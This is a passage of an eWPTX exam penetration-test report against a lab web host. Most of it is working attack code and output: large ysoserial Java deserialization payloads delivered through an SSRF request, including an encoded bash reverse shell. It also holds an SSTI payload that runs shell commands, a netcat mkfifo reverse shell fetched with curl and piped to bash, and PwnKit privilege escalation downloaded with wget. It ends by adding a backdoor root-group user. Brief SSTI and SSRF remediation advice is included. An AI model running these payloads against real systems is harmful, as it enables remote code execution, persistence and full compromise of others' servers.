cihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50
ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94
YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2Vy
aWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4v
aW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNv
bS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9y
AQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9z
dW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAM
R2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQB
AEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9p
by9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24B
AB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1
bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQAVbmMgMTAuMTAwLjEzLjIwMiAxMjM0CAAwAQAEZXhlYwEA
JyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2Vy
aWFsL1B3bmVyMzE1NTcyNjE1MTgwMwEAHkx5c29zZXJpYWwvUHduZXIzMTU1NzI2MTUxODAzOwAhAAIAAwABAAQAAQAaAAUABgAB
AAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQAT
ABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZ
AAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgAB
AAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAA
AAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxW
ZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRh
YmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMv
dXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMv
dXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXls
b2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEA
AAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+
AA14

eWPTX Exam Report 45

 Now I will upload the payload file to the Repeater of BurpSuite and launch the
attack on the web application.

BUT it failed .. so I had to do more digging to find the right payload . I did this manually , also
downloaded A LOT of versions of ysoserial , and installed JDK11 again .

The final payload was created with the following command :

java -jar ysoserial-master-8eb5cbfbf6-1.jar CommonsCollections3 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L

3RjcC8xMC4xMDAuMTMuMjAzLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}' | base64 -w0 | sed 's/+/%252b/g'

Where YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMDAuMTMuMjAzLzg4ODggMD4mMQ== is base64 encoded of :

eWPTX Exam Report 46

 It gave me the following payload :

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVt
YmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5N
YXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlv
bkhhbmRsZXI7eHBzcQB%252bAABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQD
AAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hl
LmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJz
dAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMu
Y29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAJzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25z
LmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hw
dnIAN2NvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRyQVhGaWx0ZXIAAAAAAAAAAAAAAHhwc3IA
Pm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnN0YW50aWF0ZVRyYW5zZm9ybWVyNIv0f6SG0DsCAAJb
AAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2
YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAXNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMu
dHJheC5UZW1wbGF0ZXNJbXBsCVdPwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVz
dAADW1tCWwAGX2NsYXNzcQB%252bABhMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAW
TGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhw
AAAG88r%252bur4AAAAyADkKAAMAIgcANwcAJQcAJgEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQWtIJPz
kd3vPgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAT
U3R1YlRyYW5zbGV0UGF5bG9hZAEADElubmVyQ2xhc3NlcwEANUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJU
cmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9N
O1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9j
dW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1
bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcB
AKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50
ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1Nlcmlh
bGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhp
c0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6
YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAKAEAM3lzb3NlcmlhbC9wYXlsb2Fkcy91dGls
L0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50
aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRl
cm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMBAAg8Y2xpbml0PgEA
EWphdmEvbGFuZy9SdW50aW1lBwAqAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwALAAtCgArAC4BAGFiYXNo
IC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNQzR4TURBdU1UTXVNakF6THpnNE9EZ2dNRDRtTVE9PX18e2Jh
c2U2NCwtZH18e2Jhc2gsLWl9CAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAz

eWPTX Exam Report 47

 CgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2VyaWFsL1B3bmVyNjE1MjM3MDExNzUxOAEAHkx5c29zZXJpYWwvUHduZXI2MTUy
MzcwMTE3NTE4OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAA
AAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAA
AAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAA
ADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQA
AwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AIwAAAdTK/rq%
252bAAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8
aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElu
bmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5q
YXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZh
L2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAA
AgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIA
FAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4dXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAABdnIAHWph
dmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAK
bG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAA
AAB4cHEAfgAu

So I had to put this in Requests in Burpsuite :

GET /9c717baeeca3a2c67f2c7797c96292ca/fetch.php?url=127.0.0.1:1337/?data=rO0ABXNyADJzdW4ucmVmbGVjdC5
hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXR
pbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmx
lY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB%252bAAB
zcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9
hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnM
uZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1
vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3J
tZXI7vVYq8dg0GJkCAAB4cAAAAAJzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJ
hbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAN2NvbS5zdW4ub3JnLmFwYWN
oZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRyQVhGaWx0ZXIAAAAAAAAAAAAAAHhwc3IAPm9yZy5hcGFjaGUuY29tbW9ucy5
jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnN0YW50aWF0ZVRyYW5zZm9ybWVyNIv0f6SG0DsCAAJbAAVpQXJnc3QAE1tMamF2YS9sYW5
nL09iamVjdDtbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHM
pbAIAAHhwAAAAAXNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsCVd
PwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVzdAADW1tCWwAGX2NsYXNzcQB%252
bABhMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWV
zO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhwAAAG88r%252bur4AAAAyADkKAAM
AIgcANwcAJQcAJgEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQWtIJPzkd3vPgEABjxpbml0PgEAAygpVgE
ABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATU3R1YlRyYW5zbGV0UGF5bG9hZAE
ADElubmVyQ2xhc3NlcwEANUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJ
hbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2h
lL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmc
vYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnR
lcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWN
oZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGV
yYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQA
IaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXI
BAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJ
jZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAKAEAM3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV
0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQ
BABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV
4Y2VwdGlvbgEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwA
qAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwALAAtCgArAC4BAGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVN
BK0ppQXZaR1YyTDNSamNDOHhNQzR4TURBdU1UTXVNakF6THpnNE9EZ2dNRDRtTVE9PX18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9CAA
wAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmx
lAQAceXNvc2VyaWFsL1B3bmVyNjE1MjM3MDExNzUxOAEAHkx5c29zZXJpYWwvUHduZXI2MTUyMzcwMTE3NTE4OwAhAAIAAwABAAQ
AAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAU
ADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAA
AAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAA
AAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADV
XsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AIwAAAdTK/rq%252bAAAAMgAbCgADABUHABcHABg
HABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQA
PTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJ

eWPTX Exam Report 48

 pYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJ
pYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3l
zb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwA
BAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAA
EUHducnB3AQB4dXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAABdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGV
tcGxhdGVzAAAAAAAAAAAAAAB4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9
sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHEAfgAu&action=import&
import=Try HTTP/1.1
Host: blog.terahost.exam
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://blog.terahost.exam/9c717baeeca3a2c67f2c7797c96292ca/fetch.php
Cookie: PHPSESSID=kqopb0sfkdd639inprorlla131; auth=Ti8ra1RvUVBHd25HV3hydGFpZW1OQlExeFo0dW5zNnlVa1dSV
244NmI4NlJ1ZnNLdGVydUNCYTJCNlBlT054MWZhL0tUQmNEVnhtcWY2MTd6WUswUDlXS01BU3NZZz09
Upgrade-Insecure-Requests: 1

Opened a netcat listener on port 8888 on my Kali with the following command :

nc -lvnp 8888

After executing in Burp I got the response that data.php was saved and that the data was
deserialized!
Also , checking the terminal with the listener on port 8888 I got the FIRST SHELL :

Now let’s see the other opened port 5000.

Changing the port port in request again , saw earlier I have TWIG SSTI on it, already explained
what how.
Time for the second shell to accomplish my objectives!

eWPTX Exam Report 49

 Trying a whoami command too :

127.0.0.1:5000/?name={{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

And got a hit, I am elsuser.

From above shell where I was root, I saw the elsuser is a user on the machine!
Let’s see if I can catch the second shell now .
So, we are executing commands as elsuser.

Templates should not be generated based on user-controlled input. Instead, pass user input as
template parameters after sanitizing it to eliminate undesirable and dangerous characters prior to
processing. This reduces the likelihood of your templates being compromised by malicious
attacks.

If permitting certain high-risk characters is necessary for specific template attributes, assume that
executing harmful code is unavoidable. In such cases, confining the template environment within a
Docker container can be a safer alternative. Utilizing Docker's security features, you can create a
secure setting that curtails potential malicious activities.
Like I saw in the labs in the training on INE for this course, first of all I need to create a file and
host it on my kali , I will call that file shell2.sh and the content is the following one:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.100.13.200 1313 >/tmp/f

I will host it with python http:

python3 -m http.server 80

Open a listener on port 1313:

nc -lvnp 1313

Then I will do in request this and send:

eWPTX Exam Report 50

 127.0.0.1:5000/?name={{config.__class__.__init__.__globals__['os'].popen('curl${IFS}10.100.13.200:80
81/shell2.sh|bash').read()}}

I got the shell !

Now stabilising it with python3

which python3

python3 -c 'import pty; pty.spawn("/bin/bash")'

To prevent server-side template injection, it's best to avoid letting users modify or submit new
templates, but this may not always be feasible due to operational needs. A simple method for
minimizing the risk of such vulnerabilities is to use a "logic-less" template engine like Mustache,
unless absolutely required. Keeping logic and presentation separate can significantly lessen the
chances of severe template-based attacks. Additionally, executing user code in a restricted
environment with potentially hazardous modules and functions removed can help, although
sandboxing untrusted code can be challenging and susceptible to circumvention.
Let’s enumerate more and see if I can get root on the machine..

Found that the version is old and vulnerable to PwnKit exploit

eWPTX Exam Report 51

 So , downloading Pwnkit on my Kali from https://github.com/ly4k/PwnKit

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

Hosted it on my own Kali Linux :

python3 -m http.server 8081

Downloaded on the target after going to “tmp” folder , gived permission to run, then runned it:

wget http://10.100.13.200:8081/PwnKit

chmod +x PwnKit

./PwnKit

Bum → root!!

Did ID and I see I have even more privileges then the first shell I had!
Trying to add a new user and see if I can do SSH on target with the new user :

adduser examhack --ingroup root

With the password Test123!

eWPTX Exam Report 52

 Now checking to see if I can SSH and it worked!

ssh examhack@10.100.13.34

eWPTX Exam Report 53

 That’s the third shell. For this exploit I strongly recommend an urgent update. To prevent response
data from leaking to the attacker, you must ensure that the received response is as expected.
Under no circumstances should the raw response body from the request sent
by the server be delivered to the client.
The most robust way to avoid server-side request forgery (SSRF) is to whitelist the hostname
(DNS name) or IP address that your application needs to access. If a whitelist approach does not
suit
you and you must rely on a blacklist, it’s important to validate user input properly. For example, do
not allow requests to endpoints with private (non-routable) IP addresses.
However, in the case of a blacklist, the correct mitigation to adopt will vary from application to
application. In other words, there is no universal fix to SSRF because it highly depends on
application functionality and business requirements.
IThat being wrote, I fully compromised and achieved my objectives by showing the flag, XSS,
SSTI, TWIG, 3 full shells , java deserialization any more.

Thank you for your time.

eWPTX Exam Report 54